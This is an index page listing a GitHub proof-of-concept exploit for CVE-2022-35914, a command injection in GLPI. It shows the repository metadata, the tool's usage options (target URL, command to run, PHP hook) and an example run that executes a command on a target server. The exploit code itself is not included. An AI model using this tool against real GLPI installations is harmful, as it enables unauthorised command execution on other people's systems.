Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/cosad3s/cve-2022-35914-poc
https://github.com/cosad3s/cve-2022-35914-poc
Last synced: 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/cosad3s/cve-2022-35914-poc
- Owner: cosad3s
- Created: 2022-09-30T16:43:28.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2024-01-02T11:55:38.000Z (12 months ago)
- Last Synced: 2024-01-02T12:44:39.979Z (12 months ago)
- Language: Python
- Size: 4.88 KB
- Stars: 43
- Watchers: 2
- Forks: 13
- Open Issues: 0
-
Metadata Files:
- Readme: README.MD
Awesome Lists containing this project
README
# CVE-2022-35914 PoC
## References
- https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
## Usage
```bash
pip install -r requirements.txt
```
```bash
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]
CVE-2022-35914 - GLPI - Command injection using a third-party library script
options:
-h, --help show this help message and exit
-u URL URL to test
-c CMD Command to launch
-f HOOK PHP hook function (default: exec)
--check Just check, no command execution.
--user-agent USER_AGENT
Custom User-Agent
```
Example:
```bash
❯ ./CVE-2022-35914.py -u http://glpi
[+] Command output (Return code: 0):
uid=48(apache) gid=48(apache) groups=48(apache)
```